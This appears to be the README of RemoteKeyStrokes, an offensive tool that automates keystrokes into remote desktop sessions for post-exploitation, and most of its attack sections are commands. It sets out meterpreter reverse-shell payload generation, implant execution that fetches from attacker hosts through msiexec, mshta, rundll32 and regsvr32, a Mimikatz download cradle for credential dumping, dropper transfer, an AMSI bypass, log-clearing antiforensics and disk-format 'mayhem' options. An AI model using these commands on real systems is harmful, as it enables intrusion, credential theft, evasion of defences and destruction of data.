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A script to automate keystrokes through a graphical desktop program.


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A script to automate keystrokes through an active remote desktop session that assists offensive operators in combination with living off the land techniques.

About RemoteKeyStrokes

All credits goes to nopernik for making it possible so I took it upon myself to improve it. I wanted something that helps during the post exploitation phase when executing commands through a remote desktop. It was also possible for making the SCPA project for collecting resources in a organized matter.


  • Executing commands
  • File Transfer
  • Privilege Escalation (Coming soon)
  • Persistence (Coming soon)
  • Anti-Forensics (Coming soon)
  • Mayhem (Coming soon)

Install Program


Requirements for X11

For Debian-based distros.

$ sudo apt install -y xfreerdp-x11 remmina xdotool

For RedHat-based distros.

$ sudo dnf install xdotool freerdp-2 remmina

For Arch-based distros.

$ sudo pacman -S freerdp remmina xdotool

For Gentoo-based distros.

$ sudo emerge freerdp remmina xdotool

For NixOS-based distros.

$ sudo nix-env -iA nixpkgs.xdotool nixpkgs.freerdp nixpkgs.remmina

Requirements for Wayland

For Debian-based distros.

$ sudo apt install -y freerdp2-wayland remmina

For RedHat-based distros.

$ sudo dnf install freerdp-2 remmina

For Arch-based distros.

$ sudo pacman -S freerdp remmina && yay -S wlrctl

For Gentoo-based distros.

$ sudo emerge freerdp remmina xdotool

For NixOS-based distros.

$ sudo nix-env -iA nixpkgs.freerdp nixpkgs.remmina

Clone the source repository then compile wlrctl to install the system. Skip this step if you're using any Arch-based distros.

$ git clone && cd wlrctl \
meson setup --prefix=/usr/local build && sudo ninja -C build install


Install the program in the system.

$ sudo wget -O /usr/local/bin/remotekeystrokes && \
sudo ln -sf /usr/local/bin/remotekeystrokes /usr/local/bin/rks && \
sudo chmod 755 /usr/local/bin/remotekeystrokes /usr/local/bin/rks

Help Menu

$ remotekeystrokes -h
    remotekeystrokes <flags>


    -c, --command <command | file>      Specify a command or a file contains commands
                                        to execute

    -p, --platform <operating_system>   Specify the operating system ("windows" is
                                        set by default if not specified)

    -w, --windowname <window_name>      Specify the window name to focus on the
                                        active window ("freerdp" is set by default
                                        if not specified)

    -h, --help                          Display this help message

    -i, --input <input_file>            Specify the local input file to transfer
    -o, --output <output_file>          Specify the remote output file to transfer

    -m, --method <method>               Specify a method. For command execution method
                                        "none" is set by default if not specified.
                                        For file transfer "pwshb64" is set by default
                                        if not specified. Other available methods are:
                                        "elevate", "persistence", "antiforensics", and

    -s, --submethod <submethod>         Specify a submethod from a method (applies
                                        with -m flag)

    -a, --action <action>               Specify an action from a method and/or
                                        submethod (applies with -m and/or -s flag)

    -e, --evasion <evasion>             Specify an evasion method for uploading files
                                        (only works for "pwshb64")


0x00 - Remote Authentication


  • To authenticate modern operating systems specify the flag either to force authentication as TLS /sec:tls or authentication as NLA /sec:nla.
$ xfreerdp /kbd:US /clipboard /compression /dynamic-resolution /sec:<tls | nla> [/d:"<domain_name>"] /u:"<username>" /p:"<password>" /v:<IP>:[<PORT>]
  • To authenticate legacy operating systems specify the flag /sec:rdp to force old authentication.
$ xfreerdp /kbd:US /clipboard /compression /dynamic-resolution /sec:rdp [/d:"<domain_name>"] /u:"<username>" /p:"<password>" /v:<IP>:[<PORT>]


  • To remotely authenticate a VNC machine.
$ remmina -c vnc://<username>:<password>@<IP>

0x01 - Internal Reconnaissance

Command Prompt

  • Local machine enumeration
$ cat recon_local_enum_cmds.txt
whoami /all
net user
net localgroup Administrators
ipconfig /all

$ rks -c "cmd.exe" -m dialogbox
[INFO] Checking one of the lines reaches 260 character limit
[PROG] Executing commands...
[DONE] Task completed!

$ rks -c recon_local_enum_cmds.txt
[PROG] Executing commands...
[DONE] Task completed!
  • To execute a single command
$ rks -c "cmd.exe /k \"whoami /all & net user & net localgroup Administrators & ipconfig /all & systeminfo\"" -m dialogbox
[INFO] Checking one of the lines reaches 260 character limit
[PROG] Executing commands...
[DONE] Task completed!
  • Active directory enumeration
$ cat recon_ad_enum_cmds.txt
net user /domain
net group "Domain Admins" /domain
net group "Enterprise Admins" /domain
net group "Domain Computers" /domain

$ rks -c "cmd.exe" -m dialogbox
[INFO] Checking one of the lines reaches 260 character limit
[PROG] Executing commands...
[DONE] Task completed!

$ rks -c recon_ad_enum_cmds.txt
[PROG] Executing commands...
[DONE] Task completed!

To execute a single command.

$ rks -c "cmd.exe /k \"net user /domain & net group \"Domain Admins\" /domain & net group \"Enterprise Admins\" /domain & net group \"Domain Computers\" /domain\""
[INFO] Checking one of the lines reaches 260 character limit
[PROG] Executing commands...
[DONE] Task completed!


Local machine enumeration (TODO)

$ cat recon_local_enum_cmdlets.txt

$ rks -c "powershell.exe" -m dialogbox

$ rks -c recon_local_enum_cmdlets.txt

Active directory enumeration (TODO)

$ cat recon_ad_enum_cmdlets.txt

$ rks -c "powershell.exe" -m dialogbox

$ rks -c recon_ad_enum_cmdlets.txt

0x02 - Execute Implant


Execute an implant while reading the contents of the payload in powershell.

$ msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=<IP> lport=<PORT> -f psh -o implant.ps1

$ sudo msfconsole -qx "use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set lhost <IP>; set lport <PORT>; exploit"

$ rks -c "powershell.exe" -m dialogbox

$ rks -c implant.ps1

Execute an powershell oneliner implant using metasploit-framework exploit module exploit/multi/script/web_delivery.

$ sudo msfconsole -qx "use exploit/multi/script/web_delivery; set target 2; set payload windows/x64/meterpreter/reverse_tcp; set lhost <IP>; set lport 8443; set srvhost <server_IP>; set srvport <server_PORT>; set uripath implant; exploit"

$ rks -c "cmd.exe" -m dialogbox

$ rks -c "powershell.exe -nop -w hidden -e <base64_payload>"

Execute an implant with msiexec.exe while hosting a webserver.

$ msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=<IP> lport=<PORT> -f msi -o implant.msi

$ sudo msfconsole -qx "use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set lhost <IP>; set lport <PORT>; exploit"

$ sudo python -m http.server 80

$ rks -c "msiexec /quiet /qn /i http://<attacker_IP>/implant.msi" -m dialogbox

Execute an implant with mshta.exe using metasploit-framework exploit module exploit/windows/misc/hta_server.

$ sudo msfconsole -qx "use exploit/windows/misc/hta_server; set target 2; set payload windows/x64/meterpreter/reverse_tcp; set lhost <IP>; set lport 8443; set srvhost <server_IP>; set srvhost <server_IP>; set srvport <server_PORT> exploit"

$ rks -c "mshta.exe http://<attacker_IP>:<attacker_PORT>/implant.hta" -m dialogbox

Execute an implant with rundll32.exe using metasploit-framework exploit module exploit/windows/smb/smb_delivery.

$ sudo msfconsole -qx "use exploit/windows/smb/smb_delivery; set payload windows/x64/meterpreter/reverse_tcp; set lhost <IP>; set lport 8443; set srvhost <server_IP>; set file_name implant.dll; set share data; exploit"

$ rks -c "rundll32.exe \\<attacker_IP>\data\implant.dll,0" -m dialogbox

Execute an implant with regsvr32.exe using metasploit-framework exploit module exploit/multi/script/web_delivery.

$ sudo msfconsole -qx "use exploit/multi/script/web_delivery; set target 3; set payload windows/x64/meterpreter/reverse_tcp; set lhost <IP>; set lport 8443; set srvhost <server_IP>; set srvport <server_PORT>; set uripath implant; exploit"

$ rks -c "regsvr32 /s /n /u /i://http://<attacker_IP>:<attacker_PORT>/implant.sct scrobj.dll" -m dialogbox

Cross Platform

Execute and implant with python using metasploit-framework exploit module exploit/multi/script/web_delivery.

$ sudo msfconsole -qx "use exploit/multi/script/web_delivery; set payload python/meterpreter/reverse_tcp; set lhost <IP>; set lport 8443; set srvhost <server_IP>; set srvport <server_PORT>; set uripath implant; exploit"

$ rks -c "python -c \"<payload>\""

0x03 - File Transfer

There are 11 file transfer methods in total.

Method Platform Description
pwshb64 Windows and Linux Encodes the file into base64 then decodes it with powershell.
cmdb64 Windows Uses copy con to output the encoded base64 file's content then decodes it with CertUtil.exe.
nixb64 Unix Decodes base64 content into a file.
outfile Windows and Linux Uses Out-File cmdlet to output the text file.
outfileb64 Windows Uses Out-File cmdlet to output the encoded base64 file's content then decodes it with CertUtil.exe.
copycon Windows Uses copy con command to output the text file.
pwshhex Windows and Linux Encodes the file into hexadecimal then decodes it with powershell.
cmdhex Windows Outputting a hex encoded one liner in a variable then decodes it with CertUtil.exe.
copyconhex Windows Uses copy con to output the encoded hexdump file's content then decodes it with CertUtil.exe.
nixhex Unix Outputting a hex encoded one liner in a variable then decodes with with echo -e to interpret the \x sequence character. This is suitable when dealing with IoT devices especially when Telnet lacks a feature to transfer files.
outfilehex Windows Uses Out-File cmdlet to output the encoded hexdump file's content then decodes it with CertUtil.exe.

Upload a file remotely when pivoting in a isolated network. If you want to specify the remote path on windows be sure to include quotes. By default it uses Powershell base64 to transfer files if not specified. This also includes droppers even if the size is large. Bear in mind it'll take time to complete the file transfer.

$ rks -c "powershell.exe" -m dialogbox

$ rks -i Invoke-Mimikatz.ps1 -o "C:\Windows\Temp\update.ps1" -m pwshb64
[PROG] Transferring file...
[DONE] File transferred!

To transfer droppers you can use CertUtil.exe base64 especially if it's large.

$ msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=<IP> lport=8443 -f exe -o implant.exe

To transfer droppers with powershell via CertUtil.exe base64.

$ rks -c "powershell.exe" -m dialogbox

$ rks -i implant.exe -o implant.exe -m outfileb64

It's also possible for legacy operating systems to transfer files such as, Windows XP that lacks powershell except for command prompt.

$ rks -c "cmd.exe" -m dialogbox

$ rks -i implant.exe -o implant.exe -m cmdb64

Activate your C2 listener and execute the implant.

$ sudo msfconsole -qx "use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_tcp set lhost <IP>; set lport 8443; exploit"

$ rks -c ".\implant.exe"

Another way to transfer files especially for sysadmin and offensive tools. Let's take PsExec64.exe as an example to requires us for lateral movement. It'll take a long time to upload via text without interruption. Instead the fastest way is to mount the WebDAV that belongs to the legitimate website of sysinternals suite toolkit ( Instead of using the file explorer which is much slower than executing commands. Here are the commands for command prompt.

$ cat commands.txt
net use z: \\\tools
copy z:\PsExec64.exe .
net use z: /delete

$ rks -c "cmd.exe" -m dialogbox

$ rks -c commands.txt

Here's another variant for powershell cmdlets when transferring PsExec64.exe in Windows.

$ cat cmdlets.txt
New-PSDrive -Name Z -PSProvider FileSystem -Root "\\\tools"
Copy-Item z:\PsExec64.exe .
Remove-PSDrive -Name Z

$ rks -c "powershell.exe" -m dialogbox

$ rks -c cmdlets.txt

The best way to retrieve fileless malware or offensive tools through powershell is by simply hosting/retrieving legitimate websites such as, and executing it. Let's use Invoke-Mimikatz to retrieve credentials downloading and executing the cradle from nishang.

$ cat hashdump.txt
IEX (New-Object Net.WebClient).DownloadString('')
Invoke-Mimikatz -DumpCreds

$ rks -c "powershell.exe" -m dialogbox

$ rks -c hashdump.txt

If you have large files that it's nearly impossible to wait for the file transfer to be finished. xfreerdp allows to mount a local directory with /drive:/path/to/directory/ flag. Then navigate the file browser or shell prompt to \\tsclient\<share_name>\ to view the contents.

$ mkdir Tools

$ cp /usr/share/windows-resources/mimikatz/x64/mimikatz.exe Tools/

$ xfreerdp /kbd:US /clipboard /compression /dynamic-resolution /sec:<tls | rdp | nla> [/d:"<domain_name>"] /u:"<username>" /p:"<password>" /v:<IP>:[<PORT>] /drive:Tools

$ rks -c "cmd.exe" -m dialogbox

$ rks -c "dir \\tsclient\<share_name>\"

0x04 - Privilege Escalation

Note: WIP (Work In Progress)

$ rks -m elevate -s bypassuac -a info

$ rks -m elevate -s <sub_method>

0x05 - Persistence

Note: WIP (Work In Progress)

$ rks -m persistence -s createuser

$ rks -m persistence -s sethc

0x06 - Defense Evasion

Note: WIP (Work In Progress)

You can combine AMSI Bypass with the powershell implant to circumvent Windows Security or any security solution that was integrated with AMSI scanner.

$ cat amsi_bypass.ps1

$ cat amsi_bypass.ps1 implant.ps1 > payload.ps1

$ rks -c "powershell.exe" -m dialogbox

$ rks -c payload.ps1
$ rks -m antiforensics -s wevutils

$ rks -m antiforensics -s winevent

$ rks -m antiforensics -s eventvwr

0x07 - Miscellaneous

Note: WIP (Work In Progress)

$ rks -m mayhem -s format -s diskpart -a info

$ rks -m mayhem -s format -s diskpart -a cmd

$ rks -m mayhem -s format -s diskpart -a pwsh

0x08 - Specify window name.

If you're targeting VNC, Telnet, or other network protocols you can specify the window name. This is useful whenever if you're using remmina or another terminal instance with a renamed window.

$ rks -c implant.ps1 -w <window_name>

0x09 - FAQ (Frequent Asked Questions)

What made me start this project?

It is painfully slow when I manually type with my keyboard or navigate and click with my mouse especially outside the local network. I just want to speed up the process especially when infiltrating the network.

Is it strictly only for graphical remote desktops (i.e. RDP, VNC, etc)?

Not necessarily. I made it possible for remote consoles such as, Telnet since it lacks a feature to transfer files.

Can I use the techniques for my project or other tradecraft for my own arsenal?

The techniques are common and can be reused for BadUSB, malware development, or other projects related. It's under the copyleft license of the GNU GPLv3 that permits you as the user who have the right to view how the program operates, alter the source code to your requirements, and redistribute to other users along with the source code.



To uninstall the programs.

$ sudo rm -f /usr/local/bin/remotekeystrokes /usr/local/bin/rks

TODO and Help Wanted

  • Implement encryption method of AES256 via base64

  • Implement the rest of upload methods: Base32, Base2, Base10, Base8

  • Implement privesc function for both windows and linux

  • Implement a persistence function for both windows and linux.

  • Implement antiforensics function for both windows and linux.

  • Implement mayhem function for both windows and linux.




It is your responsibility depending on whatever the cause of your actions user. Remember that with great power comes great responsibility.


A script to automate keystrokes through a graphical desktop program.







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